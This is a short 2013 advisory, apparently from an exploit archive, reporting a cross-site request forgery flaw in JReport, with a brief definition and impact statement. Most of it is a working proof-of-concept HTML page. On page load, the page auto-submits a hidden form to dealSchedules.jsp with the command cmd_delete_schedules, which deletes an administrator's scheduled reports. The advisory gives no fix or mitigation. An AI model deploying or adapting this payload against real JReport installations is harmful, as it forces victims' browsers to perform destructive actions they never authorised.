================================================================================================================================================================
 
                     JREPORT   Cross Site Request Forgery  Vulnerability
================================================================================================================================================================
 

#Date- 24/10/2013

# Author Asheesh kumar Mani Tripathi

Asheesh Anaconda
 
     
 
# Vulnerbaility Discoverd By :Poonam Singh
 
 
 
#Vulnerbility
  JREPORT   is prone to an  Cross Site Request Forgery  Vulnerability (CSRF) Vulnerability 

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
 
#Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing.
A successful CSRF exploit can compromise end user data and operation in case of normal user.
If the targeted end user is the administrator account, this can compromise the entire web application.


 
<html>
<body>
<form name="foo" action="https://172.28.1.1/jreport/jinfonet/dealSchedules.jsp"method="post">
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
<input type=hidden name="cmd" value="cmd_delete_schedules">
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
</form>
<script>
document.foo.submit();
</script>
</body>
</html>